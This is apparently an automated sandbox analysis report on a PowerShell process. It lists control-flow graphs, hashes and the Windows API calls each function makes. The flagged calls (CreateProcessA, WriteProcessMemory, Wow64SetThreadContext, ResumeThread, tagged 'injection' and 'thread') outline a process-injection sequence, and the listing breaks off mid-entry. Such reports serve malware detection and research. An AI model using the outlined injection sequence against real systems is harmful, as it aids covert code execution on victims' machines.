                                                                          control_flow_graph 672 4ee7cc0-4ee7cef 675 4ee7d74-4ee7d84 672->675 676 4ee7cf5-4ee7d1d 672->676 679 4ee7d86 675->679 680 4ee7dc5-4ee7dcb 675->680 681 4ee7d5e-4ee7d73 676->681 682 4ee7d1f-4ee7d24 676->682 685 4ee7d8f-4ee7d91 679->685 686 4ee7d88-4ee7d8a 679->686 683 4ee7dee-4ee7df1 680->683 684 4ee7dcd 680->684 687 4ee7d25-4ee7d2d 682->687 692 4ee7db6-4ee7dbc 683->692 693 4ee7df3-4ee7df5 683->693 688 4ee7de9 684->688 689 4ee7dd4-4ee7dd9 684->689 690 4ee7de2-4ee7de7 684->690 695 4ee7d93-4ee7d96 685->695 694 4ee7d8c-4ee7d8e 686->694 686->695 687->675 696 4ee7d2f-4ee7d42 687->696 688->683 689->683 690->683 692->680 700 4ee7dbe 692->700 697 4ee7df8-4ee7e77 693->697 694->685 698 4ee7d97-4ee7d98 694->698 695->698 696->675 699 4ee7d44-4ee7d51 696->699 789 4ee7e7a call 4ee91e8 697->789 790 4ee7e7a call 4ee8dd4 697->790 698->687 701 4ee7d99-4ee7db4 698->701 702 4ee7d57 699->702 703 4ee7d53-4ee7d55 699->703 700->680 700->688 700->689 700->690 704 4ee7ddb-4ee7de0 700->704 701->692 706 4ee7d58-4ee7d5c 702->706 703->706 704->683 706->681 706->682 709 4ee7e7c-4ee7e7e 710 4ee81d9-4ee81ec 709->710 711 4ee7e84-4ee7ec2 709->711 717 4ee81f3-4ee8216 call 4ee77dc 710->717 711->717 718 4ee7ec8-4ee7ee1 711->718 717->697 733 4ee821c-4ee8223 717->733 793 4ee7ee4 call 4ee89c8 718->793 794 4ee7ee4 call 4ee89c0 718->794 720 4ee7ee6-4ee7ee8 721 4ee7eee-4ee7ef8 720->721 722 4ee81bf-4ee81d2 720->722 721->717 724 4ee7efe-4ee7f2d 721->724 722->710 731 4ee81a5-4ee81b8 724->731 732 4ee7f33-4ee7f36 724->732 731->722 734 4ee7f38-4ee7f4e 732->734 735 4ee7f54-4ee7f93 732->735 734->735 739 4ee818b-4ee819e 734->739 745 4ee7f99-4ee7fb0 735->745 746 4ee8171-4ee8184 735->746 739->731 787 4ee7fb3 call 4ee8b59 745->787 788 4ee7fb3 call 4ee8b60 745->788 746->739 747 4ee7fb5-4ee7fb7 749 4ee7fbd-4ee7fdb 747->749 750 4ee8157-4ee816a 747->750 754 4ee805e-4ee8082 749->754 755 4ee7fe1-4ee800c 749->755 750->746 797 4ee8085 call 4ee8b59 754->797 798 4ee8085 call 4ee8b60 754->798 765 4ee800e-4ee8048 755->765 766 4ee8055-4ee805c 755->766 759 4ee8087-4ee8089 761 4ee808f-4ee80ae 759->761 762 4ee8123-4ee8136 759->762 761->717 768 4ee80b4-4ee80cc 761->768 775 4ee813d-4ee8150 762->775 795 4ee804b call 4ee8b59 765->795 796 4ee804b call 4ee8b60 765->796 766->754 766->755 785 4ee80cf call 4ee89c8 768->785 786 4ee80cf call 4ee89c0 768->786 771 4ee80d1-4ee80d3 772 4ee8109-4ee811c 771->772 773 4ee80d5-4ee80e1 771->773 772->762 791 4ee80e4 call 4ee8918 773->791 792 4ee80e4 call 4ee8910 773->792 775->750 778 4ee80e6-4ee80e9 778->733 780 4ee80ef-4ee8102 778->780 779 4ee804d-4ee804f 779->766 779->775 780->772 785->771 786->771 787->747 788->747 789->709 790->709 791->778 792->778 793->720 794->720 795->779 796->779 797->759 798->759
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1781032210.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4ee0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3d4938c6fa8491b9dea5f551fc584b4bbe6d3d09e98ed9ec2c753e26586b2608
                                                                          • Instruction ID: 5be2dc0408e7a3e03fc3a8e3130dd800f964898a3eabd76d64fb3773d75b2ebd
                                                                          • Opcode Fuzzy Hash: 3d4938c6fa8491b9dea5f551fc584b4bbe6d3d09e98ed9ec2c753e26586b2608
                                                                          • Instruction Fuzzy Hash: C5F18330B006198FDB14DFA9D890AAEB7B2FF89314F248559D416AB395DF31ED42CB90
                                                                          Function 079167A0 Relevance: 8.4, Strings: 6, Instructions: 861COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 79167a0-79167c5 2 7916916-7916935 0->2 3 79167cb-79167d0 0->3 13 7916937-791695c 2->13 14 79169ac-79169b3 2->14 4 79167d2-79167d8 3->4 5 79167e8-79167ec 3->5 7 79167da 4->7 8 79167dc-79167e6 4->8 9 79167f2-79167f4 5->9 10 79168c6-79168d0 5->10 7->5 8->5 11 7916837 9->11 12 79167f6-7916807 9->12 15 79168d2-79168db 10->15 16 79168de-79168e4 10->16 19 7916839-791683b 11->19 12->2 33 791680d-7916815 12->33 17 7916962-7916967 13->17 18 7916bba-7916bc7 13->18 23 79169b5 14->23 24 79169b7-79169c1 14->24 20 79168e6-79168e8 16->20 21 79168ea-79168f6 16->21 27 7916969-791696f 17->27 28 791697f-7916983 17->28 19->10 30 7916841-7916843 19->30 29 79168f8-7916913 20->29 21->29 25 79169c3-79169cb 23->25 24->25 34 79169cf-79169d1 25->34 35 7916971 27->35 36 7916973-791697d 27->36 38 7916b62-7916b6c 28->38 39 7916989-791698d 28->39 40 7916845-791684b 30->40 41 791685d-7916869 30->41 42 7916817-791681d 33->42 43 791682d-7916835 33->43 34->38 46 79169d7-79169dd 34->46 35->28 36->28 44 7916b7a-7916b80 38->44 45 7916b6e-7916b77 38->45 47 79169cd 39->47 48 791698f-79169a0 39->48 49 791684d 40->49 50 791684f-791685b 40->50 65 7916881-79168c3 41->65 66 791686b-7916871 41->66 52 7916821-791682b 42->52 53 791681f 42->53 43->19 54 7916b82-7916b84 44->54 55 7916b86-7916b92 44->55 46->38 56 79169e3-79169f0 46->56 47->34 48->18 72 79169a6-79169ab 48->72 49->41 50->41 52->43 53->43 59 7916b94-7916bb7 54->59 55->59 60 7916a86-7916ac5 56->60 61 79169f6-79169fb 56->61 93 7916acc-7916ad0 60->93 69 7916a13-7916a29 61->69 70 79169fd-7916a03 61->70 73 7916873 66->73 74 7916875-7916877 66->74 69->60 80 7916a2b-7916a4b 69->80 76 7916a05 70->76 77 7916a07-7916a11 70->77 72->14 72->25 73->65 74->65 76->69 77->69 86 7916a65-7916a84 80->86 87 7916a4d-7916a53 80->87 86->93 88 7916a55 87->88 89 7916a57-7916a63 87->89 88->86 89->86 94 7916af3 93->94 95 7916ad2-7916adb 93->95 97 7916af6-7916b02 94->97 98 7916ae2-7916aef 95->98 99 7916add-7916ae0 95->99 101 7916b08-7916b5f 97->101 100 7916af1 98->100 99->100 100->97
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1792333821.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7910000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (odq$(odq$4'dq$4'dq$tPdq$tPdq
                                                                          • API String ID: 0-1395432214
                                                                          • Opcode ID: f9c4da588ca633d05c007540fb9c8684ddf88fb16f6beae5a267eac2a50f2472
                                                                          • Instruction ID: 53d5a69c1de8475f0a683d29d66dae935464252485b3f8465acc19b19c92c455
                                                                          • Opcode Fuzzy Hash: f9c4da588ca633d05c007540fb9c8684ddf88fb16f6beae5a267eac2a50f2472
                                                                          • Instruction Fuzzy Hash: F3B104B1F0421DCFCB14CF68C850AAABBA6EF85318F14C4AAD9158B681DF71DD61CB91
                                                                          Function 07916340 Relevance: 6.5, Strings: 5, Instructions: 219COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 104 7916340-7916363 105 7916369-791636e 104->105 106 791653e-791656d 104->106 107 7916370-7916376 105->107 108 7916386-791638a 105->108 118 791658c 106->118 119 791656f-791658a 106->119 109 7916378 107->109 110 791637a-7916384 107->110 111 7916390-7916394 108->111 112 79164eb-79164f5 108->112 109->108 110->108 116 79163a7 111->116 117 7916396-79163a5 111->117 114 7916503-7916509 112->114 115 79164f7-7916500 112->115 121 791650b-791650d 114->121 122 791650f-791651b 114->122 124 79163a9-79163ab 116->124 117->124 120 791658e-7916590 118->120 119->120 127 7916592-79165a2 120->127 128 79165a5-79165af 120->128 126 791651d-791653b 121->126 122->126 124->112 129 79163b1-79163d1 124->129 130 79165b1-79165b7 128->130 131 79165ba-79165c0 128->131 143 79163f0 129->143 144 79163d3-79163ee 129->144 134 79165c2-79165c4 131->134 135 79165c6-79165d2 131->135 139 79165d4-79165ec 134->139 135->139 146 79163f2-79163f4 143->146 144->146 146->112 148 79163fa-79163fc 146->148 150 791640c 148->150 151 79163fe-791640a 148->151 153 791640e-7916410 150->153 151->153 153->112 154 7916416-7916436 153->154 157 7916438-791643e 154->157 158 791644e-7916452 154->158 159 7916440 157->159 160 7916442-7916444 157->160 161 7916454-791645a 158->161 162 791646c-7916470 158->162 159->158 160->158 163 791645c 161->163 164 791645e-791646a 161->164 165 7916477-7916479 162->165 163->162 164->162 166 7916491-79164e8 165->166 167 791647b-7916481 165->167 169 7916483 167->169 170 7916485-7916487 167->170 169->166 170->166
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1792333821.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7910000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'dq$4'dq$$dq$$dq$$dq
                                                                          • API String ID: 0-2509493698
                                                                          • Opcode ID: 71c6d0a4f06af1bc523404215fc3ca27b48a1941016b92ea6646181fb430ee7b
                                                                          • Instruction ID: a8f9e1b1302693c4f2c1bcd2c01c81ce8f72b270c60883329a3bfc6bf9299c0c
                                                                          • Opcode Fuzzy Hash: 71c6d0a4f06af1bc523404215fc3ca27b48a1941016b92ea6646181fb430ee7b
                                                                          • Instruction Fuzzy Hash: 7A6119B1F042198FDB258B79981027FBBAA9FC5218F24847ED805CB2C1DE32C961C7A1
                                                                          Function 07916316 Relevance: 3.9, Strings: 3, Instructions: 116COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 172 7916316-7916363 173 7916369-791636e 172->173 174 791653e-791656d 172->174 175 7916370-7916376 173->175 176 7916386-791638a 173->176 186 791658c 174->186 187 791656f-791658a 174->187 177 7916378 175->177 178 791637a-7916384 175->178 179 7916390-7916394 176->179 180 79164eb-79164f5 176->180 177->176 178->176 184 79163a7 179->184 185 7916396-79163a5 179->185 182 7916503-7916509 180->182 183 79164f7-7916500 180->183 189 791650b-791650d 182->189 190 791650f-791651b 182->190 192 79163a9-79163ab 184->192 185->192 188 791658e-7916590 186->188 187->188 195 7916592-79165a2 188->195 196 79165a5-79165af 188->196 194 791651d-791653b 189->194 190->194 192->180 197 79163b1-79163d1 192->197 198 79165b1-79165b7 196->198 199 79165ba-79165c0 196->199 211 79163f0 197->211 212 79163d3-79163ee 197->212 202 79165c2-79165c4 199->202 203 79165c6-79165d2 199->203 207 79165d4-79165ec 202->207 203->207 214 79163f2-79163f4 211->214 212->214 214->180 216 79163fa-79163fc 214->216 218 791640c 216->218 219 79163fe-791640a 216->219 221 791640e-7916410 218->221 219->221 221->180 222 7916416-7916436 221->222 225 7916438-791643e 222->225 226 791644e-7916452 222->226 227 7916440 225->227 228 7916442-7916444 225->228 229 7916454-791645a 226->229 230 791646c-7916470 226->230 227->226 228->226 231 791645c 229->231 232 791645e-791646a 229->232 233 7916477-7916479 230->233 231->230 232->230 234 7916491-79164e8 233->234 235 791647b-7916481 233->235 237 7916483 235->237 238 7916485-7916487 235->238 237->234 238->234
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1792333821.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7910000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'dq$$dq$$dq
                                                                          • API String ID: 0-328139867
                                                                          • Opcode ID: c5e23e14664e8f290dcdb12c54a0a94b57d951f236b0fd496fd0816eefc8c5e3
                                                                          • Instruction ID: 40c55248bcd0d17394235c55577035c0767f12a522fb8df9ca5723a4244b6197
                                                                          • Opcode Fuzzy Hash: c5e23e14664e8f290dcdb12c54a0a94b57d951f236b0fd496fd0816eefc8c5e3
                                                                          • Instruction Fuzzy Hash: 973107F1E0430A9FDB258B3585113BA7BA59F42258F5480BAD804CB1D2EF76C965C7A2
                                                                          Function 079162E8 Relevance: 3.8, Strings: 3, Instructions: 87COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 240 79162e8-791636e 242 7916370-7916376 240->242 243 7916386-791638a 240->243 244 7916378 242->244 245 791637a-7916384 242->245 246 7916390-7916394 243->246 247 79164eb-79164f5 243->247 244->243 245->243 250 79163a7 246->250 251 7916396-79163a5 246->251 248 7916503-7916509 247->248 249 79164f7-7916500 247->249 252 791650b-791650d 248->252 253 791650f-791651b 248->253 255 79163a9-79163ab 250->255 251->255 256 791651d-791653b 252->256 253->256 255->247 257 79163b1-79163d1 255->257 263 79163f0 257->263 264 79163d3-79163ee 257->264 265 79163f2-79163f4 263->265 264->265 265->247 267 79163fa-79163fc 265->267 268 791640c 267->268 269 79163fe-791640a 267->269 271 791640e-7916410 268->271 269->271 271->247 272 7916416-7916436 271->272 275 7916438-791643e 272->275 276 791644e-7916452 272->276 277 7916440 275->277 278 7916442-7916444 275->278 279 7916454-791645a 276->279 280 791646c-7916470 276->280 277->276 278->276 281 791645c 279->281 282 791645e-791646a 279->282 283 7916477-7916479 280->283 281->280 282->280 284 7916491-79164e8 283->284 285 791647b-7916481 283->285 287 7916483 285->287 288 7916485-7916487 285->288 287->284 288->284
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1792333821.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7910000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'dq$$dq$$dq
                                                                          • API String ID: 0-328139867
                                                                          • Opcode ID: 93b0204f943f3868273ad32b9c38f23afbd813b9683f0f34305143d1db901845
                                                                          • Instruction ID: 4076c7c6f5dca994701bce26d39508c5dd29b9ae9665129a8d417b7a525eb080
                                                                          • Opcode Fuzzy Hash: 93b0204f943f3868273ad32b9c38f23afbd813b9683f0f34305143d1db901845
                                                                          • Instruction Fuzzy Hash: 8A21F3F1E0420ADBDF358E258A5037A7359AF4221DF60447AD8118B2C1EFBAD5B5C762
                                                                          Function 079165F0 Relevance: 2.6, Strings: 2, Instructions: 130COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 290 79165f0-791660d 291 7916684-7916685 290->291 292 791660f-7916635 290->292 293 7916687-791668d 291->293 294 791669d-79166a1 291->294 295 7916779-791677f 292->295 296 791663b-7916640 292->296 299 7916691-791669b 293->299 300 791668f 293->300 297 79166a7-79166a9 294->297 298 7916726-7916730 294->298 301 7916642-7916648 296->301 302 7916658-7916664 296->302 297->298 303 79166ab 297->303 305 7916732-791673b 298->305 306 791673e-7916744 298->306 299->294 300->294 307 791664a 301->307 308 791664c-7916656 301->308 302->298 315 791666a-791666d 302->315 314 79166b2-79166b4 303->314 310 7916746-7916748 306->310 311 791674a-7916756 306->311 307->302 308->302 316 7916758-7916776 310->316 311->316 318 79166b6-79166bc 314->318 319 79166cc-7916723 314->319 315->298 320 7916673-791667a 315->320 322 79166c0-79166c2 318->322 323 79166be 318->323 320->295 324 7916680-7916683 320->324 322->319 323->319 324->291
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1792333821.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7910000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'dq$4'dq
                                                                          • API String ID: 0-2306408947
                                                                          • Opcode ID: 392e121d47cdd7382ae70b497511c829ae42bd78f364711f502158301266bc46
                                                                          • Instruction ID: ea50f774b3867be1f2d4ada0a367ee41e039ed7214e8c804ea394ece0722bc5a
                                                                          • Opcode Fuzzy Hash: 392e121d47cdd7382ae70b497511c829ae42bd78f364711f502158301266bc46
                                                                          • Instruction Fuzzy Hash: A54153B5F0531E8FCB148B7994446AABBFABF86258F1480BFC4048B251DF32D865CB91
                                                                          Function 04EE8DD4 Relevance: 2.3, APIs: 1, Instructions: 764processCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 327 4ee8dd4-4ee91de 329 4ee91e7-4ee91e9 327->329 330 4ee91e0-4ee91e2 327->330 331 4ee91eb-4ee927d 329->331 330->331 332 4ee91e4 330->332 335 4ee927f-4ee9289 331->335 336 4ee92b6-4ee92d6 331->336 332->329 335->336 337 4ee928b-4ee928d 335->337 341 4ee930f-4ee933e 336->341 342 4ee92d8-4ee92e2 336->342 338 4ee928f-4ee9299 337->338 339 4ee92b0-4ee92b3 337->339 343 4ee929d-4ee92ac 338->343 344 4ee929b 338->344 339->336 352 4ee9377-4ee9431 CreateProcessA 341->352 353 4ee9340-4ee934a 341->353 342->341 345 4ee92e4-4ee92e6 342->345 343->343 346 4ee92ae 343->346 344->343 347 4ee92e8-4ee92f2 345->347 348 4ee9309-4ee930c 345->348 346->339 350 4ee92f6-4ee9305 347->350 351 4ee92f4 347->351 348->341 350->350 354 4ee9307 350->354 351->350 364 4ee943a-4ee94c0 352->364 365 4ee9433-4ee9439 352->365 353->352 355 4ee934c-4ee934e 353->355 354->348 357 4ee9350-4ee935a 355->357 358 4ee9371-4ee9374 355->358 359 4ee935e-4ee936d 357->359 360 4ee935c 357->360 358->352 359->359 362 4ee936f 359->362 360->359 362->358 375 4ee94c2-4ee94c6 364->375 376 4ee94d0-4ee94d4 364->376 365->364 375->376 377 4ee94c8-4ee94cb call 4ee0444 375->377 378 4ee94d6-4ee94da 376->378 379 4ee94e4-4ee94e8 376->379 377->376 378->379 381 4ee94dc-4ee94df call 4ee0444 378->381 382 4ee94ea-4ee94ee 379->382 383 4ee94f8-4ee94fc 379->383 381->379 382->383 384 4ee94f0-4ee94f3 call 4ee0444 382->384 385 4ee950e-4ee9515 383->385 386 4ee94fe-4ee9504 383->386 384->383 389 4ee952c 385->389 390 4ee9517-4ee9526 385->390 386->385 392 4ee952d 389->392 390->389 392->392
                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 04EE941E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1781032210.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4ee0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: 159eef390c2b2e90fbf1232488748c1f9e028a2e65cccaa1a1ec706c2f9f4509
                                                                          • Instruction ID: 9b82d4fd24bfe655f4dbbc19582500b820037bd109d41ecc53bd7518b4a3234f
                                                                          • Opcode Fuzzy Hash: 159eef390c2b2e90fbf1232488748c1f9e028a2e65cccaa1a1ec706c2f9f4509
                                                                          • Instruction Fuzzy Hash: 70A18EB1D002199FEF20CFA9C8807EDBBF2EF48314F0485A9D809A7251DB74A985CF91
                                                                          Function 04EE91E8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 393 4ee91e8-4ee927d 396 4ee927f-4ee9289 393->396 397 4ee92b6-4ee92d6 393->397 396->397 398 4ee928b-4ee928d 396->398 402 4ee930f-4ee933e 397->402 403 4ee92d8-4ee92e2 397->403 399 4ee928f-4ee9299 398->399 400 4ee92b0-4ee92b3 398->400 404 4ee929d-4ee92ac 399->404 405 4ee929b 399->405 400->397 413 4ee9377-4ee9431 CreateProcessA 402->413 414 4ee9340-4ee934a 402->414 403->402 406 4ee92e4-4ee92e6 403->406 404->404 407 4ee92ae 404->407 405->404 408 4ee92e8-4ee92f2 406->408 409 4ee9309-4ee930c 406->409 407->400 411 4ee92f6-4ee9305 408->411 412 4ee92f4 408->412 409->402 411->411 415 4ee9307 411->415 412->411 425 4ee943a-4ee94c0 413->425 426 4ee9433-4ee9439 413->426 414->413 416 4ee934c-4ee934e 414->416 415->409 418 4ee9350-4ee935a 416->418 419 4ee9371-4ee9374 416->419 420 4ee935e-4ee936d 418->420 421 4ee935c 418->421 419->413 420->420 423 4ee936f 420->423 421->420 423->419 436 4ee94c2-4ee94c6 425->436 437 4ee94d0-4ee94d4 425->437 426->425 436->437 438 4ee94c8-4ee94cb call 4ee0444 436->438 439 4ee94d6-4ee94da 437->439 440 4ee94e4-4ee94e8 437->440 438->437 439->440 442 4ee94dc-4ee94df call 4ee0444 439->442 443 4ee94ea-4ee94ee 440->443 444 4ee94f8-4ee94fc 440->444 442->440 443->444 445 4ee94f0-4ee94f3 call 4ee0444 443->445 446 4ee950e-4ee9515 444->446 447 4ee94fe-4ee9504 444->447 445->444 450 4ee952c 446->450 451 4ee9517-4ee9526 446->451 447->446 453 4ee952d 450->453 451->450 453->453
                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 04EE941E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1781032210.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4ee0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: 4e092dccd892c8ae66cf7f1f2d8efbad78b2cce0b5cb29295df0842357ebe047
                                                                          • Instruction ID: ae423f8316cb2d1e974710a1392375bbdcd0a73f6e02ba40dcfda5288552625d
                                                                          • Opcode Fuzzy Hash: 4e092dccd892c8ae66cf7f1f2d8efbad78b2cce0b5cb29295df0842357ebe047
                                                                          • Instruction Fuzzy Hash: 33915CB1D002199FEF24CF69C8817EEBBF2FB48314F148569E809A7251DB74A985CF91
                                                                          Function 04EE8B59 Relevance: 1.6, APIs: 1, Instructions: 77injectionCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 454 4ee8b59-4ee8b5a 455 4ee8b5c-4ee8b61 454->455 456 4ee8b63-4ee8bae 454->456 455->456 459 4ee8bbe-4ee8bfd WriteProcessMemory 456->459 460 4ee8bb0-4ee8bbc 456->460 462 4ee8bff-4ee8c05 459->462 463 4ee8c06-4ee8c36 459->463 460->459 462->463
                                                                          APIs
                                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 04EE8BF0
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1781032210.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4ee0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: c858bcdd2680479291b11c2b4b0010d228f4ccbc146e05f6fb234d10d5523bf7
                                                                          • Instruction ID: 1596865bb6f1811db9dd6c2b872ddfc7fe92c03e8ca71a9938d17014cee6a4fc
                                                                          • Opcode Fuzzy Hash: c858bcdd2680479291b11c2b4b0010d228f4ccbc146e05f6fb234d10d5523bf7
                                                                          • Instruction Fuzzy Hash: 963158B59003499FCF10CFAAC881BEEBBF4FF48314F148429E958A7240C774A540DB94
                                                                          Function 04EE89C0 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 467 4ee89c0-4ee89c2 468 4ee89cb-4ee8a13 467->468 469 4ee89c4-4ee89c9 467->469 472 4ee8a15-4ee8a21 468->472 473 4ee8a23-4ee8a53 Wow64SetThreadContext 468->473 469->468 472->473 475 4ee8a5c-4ee8a8c 473->475 476 4ee8a55-4ee8a5b 473->476 476->475
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04EE8A46
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1781032210.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4ee0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: 814bf5d323d36653ba6661ba94a02593bef02623fcaf341281ade815094faf95
                                                                          • Instruction ID: 28962b9811ce1524775b91d50b2ca3c545a433953d1a197eb3622721cfeaadaa
                                                                          • Opcode Fuzzy Hash: 814bf5d323d36653ba6661ba94a02593bef02623fcaf341281ade815094faf95
                                                                          • Instruction Fuzzy Hash: F6219C72D002098FDB50DFAAC4417EEBBF4EF48324F64842AD558B7240CB78A545CB95
                                                                          Function 04EE8B60 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 480 4ee8b60-4ee8bae 483 4ee8bbe-4ee8bfd WriteProcessMemory 480->483 484 4ee8bb0-4ee8bbc 480->484 486 4ee8bff-4ee8c05 483->486 487 4ee8c06-4ee8c36 483->487 484->483 486->487
                                                                          APIs
                                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 04EE8BF0
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1781032210.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4ee0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: d8a3371dde26ec5a5bf115568177b508b383567f521fdbab272bad67f97c3686
                                                                          • Instruction ID: 9632505fd1c832a3ccb59f63d70f8bd6a8cd6c2c33d2f56eae2382c71e30ee32
                                                                          • Opcode Fuzzy Hash: d8a3371dde26ec5a5bf115568177b508b383567f521fdbab272bad67f97c3686
                                                                          • Instruction Fuzzy Hash: 2A215AB19003099FCB10CFAAC881BEEBBF4FF48310F108429E918A7340C778A940DBA5
                                                                          Function 04EE89C8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 491 4ee89c8-4ee8a13 494 4ee8a15-4ee8a21 491->494 495 4ee8a23-4ee8a53 Wow64SetThreadContext 491->495 494->495 497 4ee8a5c-4ee8a8c 495->497 498 4ee8a55-4ee8a5b 495->498 498->497
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04EE8A46
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1781032210.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4ee0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: d6505d72fc8f48e869b120712ecde20bd53294ea9f39815fe883317aad025483
                                                                          • Instruction ID: 09a54455f4ea7e42b4997b6da08d44f7b5b72fcfcc9f9e556ec90f6445435840
                                                                          • Opcode Fuzzy Hash: d6505d72fc8f48e869b120712ecde20bd53294ea9f39815fe883317aad025483
                                                                          • Instruction Fuzzy Hash: CA2138B1D003098FDB50DFAAC4857EEBBF4EF48324F54842AD559A7340CB78A944CBA5
                                                                          Function 04EE8910 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 502 4ee8910-4ee8912 503 4ee891b-4ee8987 ResumeThread 502->503 504 4ee8914-4ee891a 502->504 507 4ee8989-4ee898f 503->507 508 4ee8990-4ee89b5 503->508 504->503 507->508
                                                                          APIs
                                                                          Memory Dump Source
